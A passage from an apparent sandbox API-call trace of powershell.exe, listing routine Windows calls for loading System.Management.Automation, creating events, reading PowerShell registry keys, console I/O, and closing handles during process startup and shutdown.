lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.657] GetLastError () returned 0x0 [0044.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.657] GetLastError () returned 0x0 [0044.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.658] GetLastError () returned 0x0 [0044.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce018, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.658] GetLastError () returned 0x0 [0044.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.658] GetLastError () returned 0x0 [0044.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.658] GetLastError () returned 0x0 [0044.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce018, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.658] GetLastError () returned 0x0 [0044.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.658] GetLastError () returned 0x0 [0044.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.658] GetLastError () returned 0x0 [0044.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce018, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.658] GetLastError () returned 0x0 [0044.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.658] GetLastError () returned 0x0 [0044.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.658] GetLastError () returned 0x0 [0044.660] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8 [0044.660] GetLastError () returned 0x0 [0044.660] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ec [0044.660] GetLastError () returned 0x0 [0044.660] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0044.660] GetLastError () returned 0x0 [0044.660] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x408 [0044.660] GetLastError () returned 0x0 [0044.660] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x508 [0044.660] GetLastError () returned 0x0 [0044.660] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x504 [0044.661] GetLastError () returned 0x0 [0044.661] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x510 [0044.661] GetLastError () returned 0x0 [0044.661] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x50c [0044.661] GetLastError () returned 0x0 [0044.661] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x518 [0044.661] GetLastError () returned 0x0 [0044.661] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x51c [0044.661] GetLastError () returned 0x0 [0044.661] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x520 [0044.661] GetLastError () returned 0x0 [0044.661] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x524 [0044.661] GetLastError () returned 0x0 [0044.661] SetEvent (hEvent=0x408) returned 1 [0044.661] GetLastError () returned 0x0 [0044.661] SetEvent (hEvent=0x3e8) returned 1 [0044.661] GetLastError () returned 0x0 [0044.661] SetEvent (hEvent=0x3ec) returned 1 [0044.661] GetLastError () returned 0x0 [0044.661] SetEvent (hEvent=0x3f4) returned 1 [0044.661] GetLastError () returned 0x0 [0044.661] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x528 [0044.661] GetLastError () returned 0x0 [0044.662] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce580 | out: phkResult=0x1ce580*=0x52c) returned 0x0 [0044.662] RegQueryValueExW (in: hKey=0x52c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ce5c8, lpData=0x0, lpcbData=0x1ce5c4*=0x0 | out: lpType=0x1ce5c8*=0x0, lpData=0x0, lpcbData=0x1ce5c4*=0x0) returned 0x2 [0044.937] SetEvent (hEvent=0x508) returned 1 [0044.937] GetLastError () returned 0x0 [0044.937] SetEvent (hEvent=0x504) returned 1 [0044.937] GetLastError () returned 0x0 [0044.937] SetEvent (hEvent=0x510) returned 1 [0044.937] GetLastError () returned 0x0 [0044.968] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0044.968] GetLastError () returned 0x0 [0044.968] GetConsoleMode (in: hConsoleHandle=0x17, lpMode=0x1ce75c | out: lpMode=0x1ce75c) returned 1 [0044.969] GetLastError () returned 0x0 [0044.969] WriteConsoleW (in: hConsoleOutput=0x17, lpBuffer=0x202cd10*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x1ce75c, lpReserved=0x0 | out: lpBuffer=0x202cd10*, lpNumberOfCharsWritten=0x1ce75c*=0x25) returned 1 [0044.969] GetLastError () returned 0x0 [0044.969] CloseHandle (hObject=0x17) returned 1 [0044.970] GetLastError () returned 0x0 [0044.972] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0045.051] GetLastError () returned 0x0 [0045.053] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0045.053] GetLastError () returned 0x0 [0045.053] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ce6ac | out: lpConsoleScreenBufferInfo=0x1ce6ac) returned 1 [0045.053] GetLastError () returned 0x0 [0045.056] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0045.056] GetLastError () returned 0x0 [0045.056] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x1ce6ac | out: lpConsoleScreenBufferInfo=0x1ce6ac) returned 1 [0045.056] GetLastError () returned 0x0 [0045.058] CreateFileW (lpFileName="CONIN$" (normalized: "conin$"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0045.058] GetLastError () returned 0x0 [0045.059] GetConsoleMode (in: hConsoleHandle=0x1b, lpMode=0x1ce6fc | out: lpMode=0x1ce6fc) returned 1 [0045.059] GetLastError () returned 0x0 [0045.060] ReadConsoleW (hConsoleInput=0x1b, lpBuffer=0x5382428, nNumberOfCharsToRead=0x2000, lpNumberOfCharsRead=0x1ce6e0, pInputControl=0x1ce6e4) Thread: id = 16 os_tid = 0xa60 Thread: id = 17 os_tid = 0xa6c Thread: id = 18 os_tid = 0xa78 Thread: id = 19 os_tid = 0xa8c Thread: id = 20 os_tid = 0xa90 [0022.362] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0026.271] LocalFree (hMem=0x275f00) returned 0x0 [0026.271] GetLastError () returned 0x0 [0026.272] CloseHandle (hObject=0x31c) returned 1 [0026.272] GetLastError () returned 0x0 [0026.272] CloseHandle (hObject=0x13) returned 1 [0026.272] GetLastError () returned 0x0 [0026.272] CloseHandle (hObject=0xf) returned 1 [0026.272] GetLastError () returned 0x0 [0026.272] RegCloseKey (hKey=0x300) returned 0x0 [0026.272] RegCloseKey (hKey=0x2fc) returned 0x0 [0026.272] RegCloseKey (hKey=0x2f8) returned 0x0 [0026.273] LocalFree (hMem=0x275c60) returned 0x0 [0026.273] GetLastError () returned 0x0 [0026.273] RegCloseKey (hKey=0x328) returned 0x0 [0027.328] RegCloseKey (hKey=0x368) returned 0x0 [0027.328] RegCloseKey (hKey=0x364) returned 0x0 [0027.329] RegCloseKey (hKey=0x360) returned 0x0 [0027.329] RegCloseKey (hKey=0x35c) returned 0x0 [0027.329] RegCloseKey (hKey=0x358) returned 0x0 [0027.329] RegCloseKey (hKey=0x354) returned 0x0 [0027.329] RegCloseKey (hKey=0x350) returned 0x0 [0027.329] RegCloseKey (hKey=0x398) returned 0x0 [0027.330] RegCloseKey (hKey=0x394) returned 0x0 [0027.330] RegCloseKey (hKey=0x340) returned 0x0 [0027.330] RegCloseKey (hKey=0x33c) returned 0x0 [0027.330] RegCloseKey (hKey=0x338) returned 0x0 [0027.330] RegCloseKey (hKey=0x334) returned 0x0 [0027.331] RegCloseKey (hKey=0x330) returned 0x0 [0027.331] RegCloseKey (hKey=0x32c) returned 0x0 [0027.331] RegCloseKey (hKey=0x31c) returned 0x0 [0027.331] RegCloseKey (hKey=0x2fc) returned 0x0 [0027.331] RegCloseKey (hKey=0x2f8) returned 0x0 [0027.331] RegCloseKey (hKey=0x390) returned 0x0 [0027.332] RegCloseKey (hKey=0x38c) returned 0x0 [0027.332] RegCloseKey (hKey=0x36c) returned 0x0 [0027.332] RegCloseKey (hKey=0x3a0) returned 0x0 [0027.332] RegCloseKey (hKey=0x384) returned 0x0 [0027.333] RegCloseKey (hKey=0x380) returned 0x0 [0027.333] RegCloseKey (hKey=0x37c) returned 0x0 [0027.333] RegCloseKey (hKey=0x378) returned 0x0 [0027.333] RegCloseKey (hKey=0x374) returned 0x0 [0027.333] RegCloseKey (hKey=0x370) returned 0x0 [0027.333] RegCloseKey (hKey=0x34c) returned 0x0 [0027.333] RegCloseKey (hKey=0x39c) returned 0x0 [0027.334] RegCloseKey (hKey=0x328) returned 0x0 [0044.964] CloseHandle (hObject=0x17) returned 1 [0044.968] GetLastError () returned 0x0 [0044.968] CloseHandle (hObject=0x5f) returned 1 [0044.968] GetLastError () returned 0x0 [0044.969] CloseHandle (hObject=0x13) returned 1 [0044.969] GetLastError () returned 0x0 [0044.969] CloseHandle (hObject=0xf) returned 1 [0044.969] GetLastError () returned 0x0 [0044.969] CloseHandle (hObject=0x8f) returned 1 [0044.972] GetLastError () returned 0x0 [0044.972] RegCloseKey (hKey=0x52c) returned 0x0 [0044.973] CloseHandle (hObject=0x43) returned 1 [0044.973] GetLastError () returned 0x0 [0044.973] CloseHandle (hObject=0x3f) returned 1 [0044.973] GetLastError () returned 0x0 [0044.973] CloseHandle (hObject=0x3b) returned 1 [0044.973] GetLastError () returned 0x0 [0044.974] CloseHandle (hObject=0x97) returned 1 [0044.974] GetLastError () returned 0x0 [0044.974] CloseHandle (hObject=0x8b) returned 1 [0044.974] GetLastError () returned 0x0 [0044.974] CloseHandle (hObject=0x73) returned 1 [0044.975] GetLastError () returned 0x0 [0044.975] CloseHandle (hObject=0x6f) returned 1 [0044.975] GetLastError () returned 0x0 [0044.975] CloseHandle (hObject=0x5b) returned 1 [0044.975] GetLastError () returned 0x0 [0044.975] CloseHandle (hObject=0x57) returned 1 [0044.975] GetLastError () returned 0x0 [0044.975] CloseHandle (hObject=0x37) returned 1 [0044.976] GetLastError () returned 0x0 [0044.976] CloseHandle (hObject=0x33) returned 1 [0044.976] GetLastError () returned 0x0 [0044.976] CloseHandle (hObject=0x410) returned 1 [0044.976] GetLastError () returned 0x0 [0044.976] CloseHandle (hObject=0x2f) returned 1 [0044.976] GetLastError () returned 0x0 [0044.976] CloseHandle (hObject=0x40c) returned 1 [0044.976] GetLastError () returned 0x0 [0044.977] CloseHandle (hObject=0x53) returned 1 [0044.977] GetLastError () returned 0x0 [0044.977] CloseHandle (hObject=0x6b) returned 1 [0044.977] GetLastError () returned 0x0 [0044.977] CloseHandle (hObject=0x87) returned 1 [0044.977] GetLastError () returned 0x0 [0044.977] CloseHandle (hObject=0x7f) returned 1 [0044.978] GetLastError () returned 0x0 [0044.978] CloseHandle (hObject=0x3c0) returned 1 [0044.978] GetLastError () returned 0x0 [0044.978] CloseHandle (hObject=0x7b) returned 1 [0044.978] GetLastError () returned 0x0 [0044.978] CloseHandle (hObject=0x3bc) returned 1 [0044.978] GetLastError () returned 0x0 [0044.978] CloseHandle (hObject=0x77) returned 1 [0044.979] GetLastError () returned 0x0 [0044.979] CloseHandle (hObject=0x3b8) returned 1 [0044.979] GetLastError () returned 0x0 [0044.979] CloseHandle (hObject=0x2b) returned 1 [0044.979] GetLastError () returned 0x0 [0044.979] CloseHandle (hObject=0x3b4) returned 1 [0044.979] GetLastError () returned 0x0 [0044.979] CloseHandle (hObject=0x27) returned 1 [0044.980] GetLastError () returned 0x0 [0044.980] CloseHandle (hObject=0x3b0) returned 1 [0044.980] GetLastError () returned 0x0 [0044.980] CloseHandle (hObject=0x23) returned 1 [0044.980] GetLastError () returned 0x0 [0044.980] CloseHandle (hObject=0x83) returned 1 [0044.980] GetLastError () returned 0x0 [0044.980] CloseHandle (hObject=0x4f) returned 1 [0044.981] GetLastError () returned 0x0 [0044.981] CloseHandle (hObject=0x368) returned 1 [0044.981] GetLastError () returned 0x0 [0044.981] CloseHandle (hObject=0x4d4) returned 1 [0044.981] GetLastError () returned 0x0 [0044.981] CloseHandle (hObject=0x364) returned 1 [0044.981] GetLastError () returned 0x0 [0044.981] CloseHandle (hObject=0x360) returned 1 [0044.981] GetLastError () returned 0x0 [0044.982] CloseHandle (hObject=0x35c) returned 1 [0044.982] GetLastError () returned 0x0 [0044.982] CloseHandle (hObject=0x4b) returned 1 [0044.982] GetLastError () returned 0x0 [0044.982] CloseHandle (hObject=0x358) returned 1 [0044.982] GetLastError () returned 0x0 [0044.982] CloseHandle (hObject=0x4dc) returned 1 [0044.982] GetLastError () returned 0x0 [0044.982] CloseHandle (hObject=0x350) returned 1 [0044.982] GetLastError () returned 0x0 [0044.983] CloseHandle (hObject=0x354) returned 1 [0044.983] GetLastError () returned 0x0 [0044.983] CloseHandle (hObject=0x47) returned 1 [0044.983] GetLastError () returned 0x0 [0044.983] CloseHandle (hObject=0x93) returned 1 [0044.983] GetLastError () returned 0x0 [0044.984] CloseHandle (hObject=0x398) returned 1 [0044.984] GetLastError () returned 0x0 [0044.984] CloseHandle (hObject=0x67) returned 1 [0044.984] GetLastError () returned 0x0 [0044.984] CloseHandle (hObject=0x464) returned 1 [0044.984] GetLastError () returned 0x0 [0044.984] CloseHandle (hObject=0x63) returned 1 [0044.984] GetLastError () returned 0x0 [0044.985] CloseHandle (hObject=0x460) returned 1 [0044.985] GetLastError () returned 0x0 [0044.985] RegCloseKey (hKey=0x330) returned 0x0 [0044.985] CloseHandle (hObject=0x32c) returned 1 [0044.985] GetLastError () returned 0x0 [0044.985] CloseHandle (hObject=0x1f) returned 1 [0044.985] GetLastError () returned 0x0 [0044.985] CloseHandle (hObject=0x31c) returned 1 [0044.985] GetLastError () returned 0x0 [0044.985] CloseHandle (hObject=0x2fc) returned 1 [0044.985] GetLastError () returned 0x0 [0044.986] CloseHandle (hObject=0x2f8) returned 1 [0044.986] GetLastError () returned 0x0 [0044.986] CloseHandle (hObject=0x390) returned 1 [0044.986] GetLastError () returned 0x0 [0044.986] CloseHandle (hObject=0x38c) returned 1 [0044.986] GetLastError () returned 0x0 [0044.986] CloseHandle (hObject=0x36c) returned 1 [0044.986] GetLastError () returned 0x0 [0044.986] CloseHandle (hObject=0x3a0) returned 1 [0044.986] GetLastError () returned 0x0 [0044.986] CloseHandle (hObject=0x384) returned 1 [0044.986] GetLastError () returned 0x0 [0044.986] CloseHandle (hObject=0x380) returned 1 [0044.986] GetLastError () returned 0x0 [0044.986] CloseHandle (hObject=0x37c) returned 1 [0044.986] GetLastError () returned 0x0 [0044.986] CloseHandle (hObject=0x378) returned 1 [0044.986] GetLastError () returned 0x0 [0044.987] CloseHandle (hObject=0x374) returned 1 [0044.987] GetLastError () returned 0x0 [0044.987] CloseHandle (hObject=0x1b) returned 1 [0044.987] GetLastError () returned 0x0 Thread: id = 22 os_tid = 0xaa8 [0028.007] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0028.036] SetThreadUILanguage (LangId=0x0) returned 0x409 [0028.042] VirtualQuery (in: lpAddress=0x510e180, lpBuffer=0x510f180, dwLength=0x1c | out: lpBuffer=0x510f180*(BaseAddress=0x510e000, AllocationBase=0x4780000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0028.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.045] GetLastError () returned 0xcb [0028.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.049] GetLastError () returned 0xcb [0028.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.050] GetLastError () returned 0xcb [0028.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.064] GetLastError () returned 0xcb [0028.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.066] GetLastError () returned 0xcb [0028.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.067] GetLastError () returned 0xcb [0028.077] VirtualQuery (in: lpAddress=0x510e29c, lpBuffer=0x510f29c, dwLength=0x1c | out: lpBuffer=0x510f29c*(BaseAddress=0x510e000, AllocationBase=0x4780000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0028.078] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.078] GetLastError () returned 0xcb [0028.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.080] GetLastError () returned 0xcb [0028.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.080] GetLastError () returned 0xcb [0028.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.088] GetLastError () returned 0xcb [0028.105] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.105] GetLastError () returned 0xcb [0028.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.137] GetLastError () returned 0xcb [0028.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.138] GetLastError () returned 0xcb [0028.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.139] GetLastError () returned 0xcb [0028.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.140] GetLastError () returned 0xcb [0028.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.142] GetLastError () returned 0xcb [0028.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.142] GetLastError () returned 0xcb [0028.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.143] GetLastError () returned 0xcb [0028.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.165] GetLastError () returned 0xcb [0028.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.295] GetLastError () returned 0xcb [0028.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.299] GetLastError () returned 0xcb [0028.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.302] GetLastError () returned 0xcb [0028.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x510e730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0028.876] GetLastError () returned 0xcb [0028.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x510e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0028.876] GetLastError () returned 0xcb [0028.880] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3249e8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0028.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x510e768, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0028.880] GetLastError () returned 0x0 [0028.898] GetCurrentProcess () returned 0xffffffff [0028.898] GetLastError () returned 0x3f0 [0028.898] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x510e87c | out: TokenHandle=0x510e87c*=0x398) returned 1 [0028.898] GetLastError () returned 0x3f0 [0028.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x510e414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e [0028.903] GetLastError () returned 0x0 [0028.905] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x510e8bc | out: lpFileInformation=0x510e8bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x7da1e096, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0028.905] GetLastError () returned 0x0 [0028.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x510e3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0028.908] GetLastError () returned 0x0 [0028.909] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x510e8b8 | out: lpFileInformation=0x510e8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e385d07, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x8e385d07, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x7da1e096, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0028.909] GetLastError () returned 0x0 [0028.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x510e320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0028.909] GetLastError () returned 0x0 [0028.909] SetErrorMode (uMode=0x1) returned 0x1 [0028.909] CreateFileW 